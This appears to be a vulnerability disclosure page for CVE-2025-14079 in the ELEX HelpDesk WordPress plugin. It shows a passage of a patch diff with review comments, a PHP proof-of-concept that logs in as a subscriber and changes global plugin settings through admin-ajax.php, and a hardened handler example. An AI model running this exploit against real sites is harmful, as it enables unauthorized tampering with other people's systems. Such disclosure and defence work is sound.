-        return 6;
-    }
-}
--- a/elex-helpdesk-customer-support-ticket-system/vendor/carbonphp/carbon-doctrine-types/src/Carbon/Doctrine/DateTimeDefaultPrecision.php
+++ b/elex-helpdesk-customer-support-ticket-system/vendor/carbonphp/carbon-doctrine-types/src/Carbon/Doctrine/DateTimeDefaultPrecision.php
@@ -1,28 +0,0 @@
-<?php
-
-namespace CarbonDoctrine;
-
-class DateTimeDefaultPrecision
-{
-    private static $precision = 6;
-
-    /**
-     * Change the default Doctrine datetime and datetime_immutable precision.
-     *
-     * @param int $precision
-     */
-    public static function set(int $precision): void
-    {
-        self::$precision = $precision;
-    }
-
-    /**
-     * Get the default Doctrine datetime and datetime_immutable precision.
-     *
-     * @return int
-     */
-    public static function get(): int
-    {
-        return self::$precision;
-    }
-}
--- a/elex-helpdesk-customer-support-ticket-system/vendor/carbonphp/carbon-doctrine-types/src/Carbon/Doctrine/DateTimeImmutableType.php
+++ b/elex-helpdesk-customer-support-ticket-system/vendor/carbonphp/carbon-doctrine-types/src/Carbon/Doctrine/DateTimeImmutableType.php
@@ -1,20 +0,0 @@
-<?php
-
-namespace CarbonDoctrine;
-
-use CarbonCarbonImmutable;
-use DoctrineDBALTypesVarDateTimeImmutableType;
-
-class DateTimeImmutableType extends VarDateTimeImmutableType implements CarbonDoctrineType
-{
-    /** @use CarbonTypeConverter<CarbonImmutable> */
-    use CarbonTypeConverter;
-
-    /**
-     * @return class-string<CarbonImmutable>
-     */
-    protected function getCarbonClassName(): string
-    {
-        return CarbonImmutable::class;
-    }
-}
--- a/elex-helpdesk-customer-support-ticket-system/vendor/carbonphp/carbon-doctrine-types/src/Carbon/Doctrine/DateTimeType.php
+++ b/elex-helpdesk-customer-support-ticket-system/vendor/carbonphp/carbon-doctrine-types/src/Carbon/Doctrine/DateTimeType.php
@@ -1,12 +0,0 @@
-<?php
-
-namespace CarbonDoctrine;
-
-use CarbonCarbon;
-use DoctrineDBALTypesVarDateTimeType;
-
-class DateTimeType extends VarDateTimeType implements CarbonDoctrineType
-{
-    /** @use CarbonTypeConverter<Carbon> */
-    use CarbonTypeConverter;
-}
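Review bot: Deleting the whole `carbonphp/carbon-doctrine-types` package is consistent with the `nesbot/carbon` version recorded later in `installed.php` (the removed trait's own comment explains that these types used to be embedded in nesbot/carbon directly), but it means this security release also changes the vendored dependency set and the Composer autoload maps, which should be called out in the changelog so site owners can distinguish the authorization fix from the dependency churn. Also note that the namespace separators are missing throughout these deleted files as rendered (`CarbonDoctrine`, `DoctrineDBALPlatformsAbstractPlatform`); that is a display artefact of this page, not the code under review.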
--- a/elex-helpdesk-customer-support-ticket-system/vendor/composer/autoload_psr4.php
+++ b/elex-helpdesk-customer-support-ticket-system/vendor/composer/autoload_psr4.php
@@ -15,13 +15,11 @@
     'Psr\Http\Message\' => array($vendorDir . '/psr/http-factory/src', $vendorDir . '/psr/http-message/src'),
     'Psr\Http\Client\' => array($vendorDir . '/psr/http-client/src'),
     'Psr\Container\' => array($vendorDir . '/psr/container/src'),
-    'Psr\Clock\' => array($vendorDir . '/psr/clock/src'),
     'Illuminate\Support\' => array($vendorDir . '/illuminate/support', $vendorDir . '/illuminate/collections', $vendorDir . '/illuminate/macroable'),
     'Illuminate\Contracts\' => array($vendorDir . '/illuminate/contracts'),
     'GuzzleHttp\Psr7\' => array($vendorDir . '/guzzlehttp/psr7/src'),
     'GuzzleHttp\Promise\' => array($vendorDir . '/guzzlehttp/promises/src'),
     'GuzzleHttp\' => array($vendorDir . '/guzzlehttp/guzzle/src'),
-    'Doctrine\Inflector\' => array($vendorDir . '/doctrine/inflector/src'),
-    'Carbon\Doctrine\' => array($vendorDir . '/carbonphp/carbon-doctrine-types/src/Carbon/Doctrine'),
+    'Doctrine\Inflector\' => array($vendorDir . '/doctrine/inflector/lib/Doctrine/Inflector'),
     'Carbon\' => array($vendorDir . '/nesbot/carbon/src/Carbon'),
 );
--- a/elex-helpdesk-customer-support-ticket-system/vendor/composer/autoload_static.php
+++ b/elex-helpdesk-customer-support-ticket-system/vendor/composer/autoload_static.php
@@ -38,7 +38,6 @@
             'Psr\Http\Message\' => 17,
             'Psr\Http\Client\' => 16,
             'Psr\Container\' => 14,
-            'Psr\Clock\' => 10,
         ),
         'I' =>
         array (
@@ -57,7 +56,6 @@
         ),
         'C' =>
         array (
-            'Carbon\Doctrine\' => 16,
             'Carbon\' => 7,
         ),
     );
@@ -100,10 +98,6 @@
         array (
             0 => __DIR__ . '/..' . '/psr/container/src',
         ),
-        'Psr\Clock\' =>
-        array (
-            0 => __DIR__ . '/..' . '/psr/clock/src',
-        ),
         'Illuminate\Support\' =>
         array (
             0 => __DIR__ . '/..' . '/illuminate/support',
@@ -128,11 +122,7 @@
         ),
         'Doctrine\Inflector\' =>
         array (
-            0 => __DIR__ . '/..' . '/doctrine/inflector/src',
-        ),
-        'Carbon\Doctrine\' =>
-        array (
-            0 => __DIR__ . '/..' . '/carbonphp/carbon-doctrine-types/src/Carbon/Doctrine',
+            0 => __DIR__ . '/..' . '/doctrine/inflector/lib/Doctrine/Inflector',
         ),
         'Carbon\' =>
         array (
--- a/elex-helpdesk-customer-support-ticket-system/vendor/composer/installed.php
+++ b/elex-helpdesk-customer-support-ticket-system/vendor/composer/installed.php
@@ -7,22 +7,13 @@
         'type' => 'wordpress-plugin',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
-        'dev' => true,
+        'dev' => false,
     ),
     'versions' => array(
-        'carbonphp/carbon-doctrine-types' => array(
-            'pretty_version' => '2.1.0',
-            'version' => '2.1.0.0',
-            'reference' => '99f76ffa36cce3b70a4a6abce41dba15ca2e84cb',
-            'type' => 'library',
-            'install_path' => __DIR__ . '/../carbonphp/carbon-doctrine-types',
-            'aliases' => array(),
-            'dev_requirement' => false,
-        ),
         'doctrine/inflector' => array(
-            'pretty_version' => '2.1.0',
-            'version' => '2.1.0.0',
-            'reference' => '6d6c96277ea252fc1304627204c3d5e6e15faa3b',
+            'pretty_version' => '2.0.8',
+            'version' => '2.0.8.0',
+            'reference' => 'f9301a5b2fb1216b2b08f02ba04dc45423db6bff',
             'type' => 'library',
             'install_path' => __DIR__ . '/../doctrine/inflector',
             'aliases' => array(),
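Review bot: Two things in this hunk deserve a second look. `'dev' => true` becoming `false` indicates the vendor tree was regenerated with `--no-dev`, which is the right setting for a shipped plugin. `doctrine/inflector` moving from 2.1.0 to 2.0.8 (with the autoload path changing to `lib/Doctrine/Inflector`, matching the `autoload_psr4.php` and `autoload_static.php` hunks above) is a downgrade, so confirm it was intentional rather than the result of building from an older lock file.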
@@ -38,27 +29,27 @@
             'dev_requirement' => false,
         ),
         'guzzlehttp/guzzle' => array(
-            'pretty_version' => '7.10.0',
-            'version' => '7.10.0.0',
-            'reference' => 'b51ac707cfa420b7bfd4e4d5e510ba8008e822b4',
+            'pretty_version' => '7.7.0',
+            'version' => '7.7.0.0',
+            'reference' => 'fb7566caccf22d74d1ab270de3551f72a58399f5',
             'type' => 'library',
             'install_path' => __DIR__ . '/../guzzlehttp/guzzle',
             'aliases' => array(),
             'dev_requirement' => false,
         ),
         'guzzlehttp/promises' => array(
-            'pretty_version' => '2.3.0',
-            'version' => '2.3.0.0',
-            'reference' => '481557b130ef3790cf82b713667b43030dc9c957',
+            'pretty_version' => '2.0.1',
+            'version' => '2.0.1.0',
+            'reference' => '111166291a0f8130081195ac4556a5587d7f1b5d',
             'type' => 'library',
             'install_path' => __DIR__ . '/../guzzlehttp/promises',
             'aliases' => array(),
             'dev_requirement' => false,
         ),
         'guzzlehttp/psr7' => array(
-            'pretty_version' => '2.8.0',
-            'version' => '2.8.0.0',
-            'reference' => '21dc724a0583619cd1652f673303492272778051',
+            'pretty_version' => '2.6.0',
+            'version' => '2.6.0.0',
+            'reference' => '8bd7c33a0734ae1c5d074360512beb716bef3f77',
             'type' => 'library',
             'install_path' => __DIR__ . '/../guzzlehttp/psr7',
             'aliases' => array(),
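Review bot: This hunk downgrades `guzzlehttp/guzzle` 7.10.0 to 7.7.0, `guzzlehttp/promises` 2.3.0 to 2.0.1 and `guzzlehttp/psr7` 2.8.0 to 2.6.0. Shipping older HTTP-client releases inside a security fix is the opposite of what users will expect from a 3.3.6 update; unless there is a compatibility reason, rebuild the vendor directory from a current lock file, or document why the older versions are required.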
@@ -110,29 +101,14 @@
             'dev_requirement' => false,
         ),
         'nesbot/carbon' => array(
-            'pretty_version' => '2.73.0',
-            'version' => '2.73.0.0',
-            'reference' => '9228ce90e1035ff2f0db84b40ec2e023ed802075',
+            'pretty_version' => '2.68.1',
+            'version' => '2.68.1.0',
+            'reference' => '4f991ed2a403c85efbc4f23eb4030063fdbe01da',
             'type' => 'library',
             'install_path' => __DIR__ . '/../nesbot/carbon',
             'aliases' => array(),
             'dev_requirement' => false,
         ),
-        'psr/clock' => array(
-            'pretty_version' => '1.0.0',
-            'version' => '1.0.0.0',
-            'reference' => 'e41a24703d4560fd0acb709162f73b8adfc3aa0d',
-            'type' => 'library',
-            'install_path' => __DIR__ . '/../psr/clock',
-            'aliases' => array(),
-            'dev_requirement' => false,
-        ),
-        'psr/clock-implementation' => array(
-            'dev_requirement' => false,
-            'provided' => array(
-                0 => '1.0',
-            ),
-        ),
         'psr/container' => array(
             'pretty_version' => '1.1.2',
             'version' => '1.1.2.0',
@@ -143,9 +119,9 @@
             'dev_requirement' => false,
         ),
         'psr/http-client' => array(
-            'pretty_version' => '1.0.3',
-            'version' => '1.0.3.0',
-            'reference' => 'bb5906edc1c324c9a05aa0873d40117941e5fa90',
+            'pretty_version' => '1.0.2',
+            'version' => '1.0.2.0',
+            'reference' => '0955afe48220520692d2d09f7ab7e0f93ffd6a31',
             'type' => 'library',
             'install_path' => __DIR__ . '/../psr/http-client',
             'aliases' => array(),
@@ -158,9 +134,9 @@
             ),
         ),
         'psr/http-factory' => array(
-            'pretty_version' => '1.1.0',
-            'version' => '1.1.0.0',
-            'reference' => '2b4765fddfe3b508ac62f829e852b1501d3f6e8a',
+            'pretty_version' => '1.0.2',
+            'version' => '1.0.2.0',
+            'reference' => 'e616d01114759c4c489f93b099585439f795fe35',
             'type' => 'library',
             'install_path' => __DIR__ . '/../psr/http-factory',
             'aliases' => array(),
@@ -206,9 +182,9 @@
             'dev_requirement' => false,
         ),
         'symfony/deprecation-contracts' => array(
-            'pretty_version' => 'v2.5.4',
-            'version' => '2.5.4.0',
-            'reference' => '605389f2a7e5625f273b53960dc46aeaf9c62918',
+            'pretty_version' => 'v2.5.2',
+            'version' => '2.5.2.0',
+            'reference' => 'e8b495ea28c1d97b5e0c121748d6f9b53d075c66',
             'type' => 'library',
       

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.


PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14079 - ELEX WordPress HelpDesk & Customer Ticketing System <= 3.3.5 - Missing Authorization to Authenticated (Subscriber+) Settings Update

/**
 * Proof of Concept for CVE-2025-14079
 * Requires: WordPress installation with ELEX HelpDesk plugin <= 3.3.5
 *           Valid subscriber-level credentials
 *           Valid nonce from wsdesk_nonce (available to subscribers)
 */

$target_url = 'https://vulnerable-site.com';
$username = 'subscriber_user';
$password = 'subscriber_pass';

// Initialize a single cURL session; the cookie jar keeps the WordPress
// login session across the three requests below.
$ch = curl_init();

// Step 1: Log in to WordPress and obtain authentication cookies
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

$response = curl_exec($ch);

// Step 2: Fetch the WSDesk interface, which exposes the nonce to subscribers
// The nonce is typically available in page source or via AJAX
$admin_url = $target_url . '/wp-admin/admin.php?page=wsdesk_settings';
curl_setopt($ch, CURLOPT_URL, $admin_url);
curl_setopt($ch, CURLOPT_HTTPGET, true); // switch the reused handle back to GET
$response = curl_exec($ch);

// Extract nonce from response (simplified - actual implementation would parse HTML)
// In real exploitation, the nonce would be obtained from page source or JavaScript
$nonce = 'EXTRACTED_NONCE_VALUE'; // Replace with actual nonce extraction

// Step 3: Exploit missing authorization in eh_crm_ticket_general function
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$exploit_data = array(
    'action' => 'eh_crm_ticket_general',
    'nonce' => $nonce,
    'default_assignee' => 'attacker_user_id',  // Change default assignee to attacker
    'default_label' => 'critical',            // Modify default ticket label
    'ticket_raiser' => 'registered_user',     // Change ticket raiser setting
    'ticket_raiser_roles' => 'subscriber'     // Modify allowed roles
);

curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_data));

$response = curl_exec($ch);

// Check response
if (strpos($response, 'success') !== false || strpos($response, 'updated') !== false) {
    echo "[+] Vulnerability exploited successfully\n";
    echo "[+] Global WSDesk settings modified by subscriber user\n";
    echo "[+] Response: " . $response . "\n";
} else {
    echo "[-] Exploit failed\n";
    echo "[-] Response: " . $response . "\n";
}

curl_close($ch);
?>
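The defender-side counterpart to the PoC above, added here as an example and not taken from the plugin: a constructed WordPress AJAX settings handler in the shape the PoC relies on (nonce verified, no capability check), beside a hardened version that treats CSRF protection and authorization as two separate checks. All function, hook, option and nonce-action names are hypothetical; the WordPress API calls (`check_ajax_referer`, `current_user_can`, `wp_send_json_error`, `update_option`) are real core functions.

```php
<?php
// Added example, not the plugin's code. Names prefixed "example_" are hypothetical.

// Vulnerable pattern: a nonce only proves the request originated from a page
// the current user loaded; it says nothing about what that user may do.
// Every logged-in role, subscribers included, reaches wp_ajax_* handlers, so
// any user who can read the nonce passes this check and updates global options.
function example_ticket_general_vulnerable() {
    if ( ! wp_verify_nonce( $_POST['nonce'] ?? '', 'example_nonce_action' ) ) {
        wp_send_json_error( 'bad nonce', 403 );
    }
    update_option( 'example_default_assignee', absint( $_POST['default_assignee'] ?? 0 ) );
    update_option( 'example_default_label', sanitize_text_field( wp_unslash( $_POST['default_label'] ?? '' ) ) );
    wp_send_json_success( 'updated' );
}

// Hardened pattern: CSRF check, then an explicit capability check, then
// input validation before anything is written.
function example_ticket_general_hardened() {
    // 1. CSRF: on failure check_ajax_referer() dies with HTTP 403 for AJAX requests.
    check_ajax_referer( 'example_nonce_action', 'nonce' );

    // 2. Authorization: changing plugin-wide settings is an admin-level action.
    //    manage_options is the standard capability for this; a plugin may
    //    define its own capability instead, as long as one is actually checked.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient permissions', 403 );
    }

    // 3. Validation: only accept a default assignee that is an existing user.
    $assignee_id = absint( $_POST['default_assignee'] ?? 0 );
    if ( $assignee_id === 0 || ! get_userdata( $assignee_id ) ) {
        wp_send_json_error( 'invalid assignee', 400 );
    }

    // Restrict the label to a known set rather than storing arbitrary text.
    $allowed_labels = array( 'low', 'normal', 'high', 'critical' );
    $label = sanitize_text_field( wp_unslash( $_POST['default_label'] ?? '' ) );
    if ( ! in_array( $label, $allowed_labels, true ) ) {
        wp_send_json_error( 'invalid label', 400 );
    }

    update_option( 'example_default_assignee', $assignee_id );
    update_option( 'example_default_label', $label );
    wp_send_json_success( 'updated' );
}

// Registering only under wp_ajax_ (not wp_ajax_nopriv_) limits the handler to
// logged-in users, but that is authentication, not authorization: the
// capability check inside the handler is what keeps subscribers out.
add_action( 'wp_ajax_example_ticket_general', 'example_ticket_general_hardened' );
```

When reviewing a plugin for this class of bug, the test is mechanical: for every `wp_ajax_*` callback that writes options or posts, confirm there is a `current_user_can()` (or equivalent) call on the code path before the write, independent of whether a nonce is verified. A nonce shared between roles, as the PoC above depends on, is harmless once that check exists.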
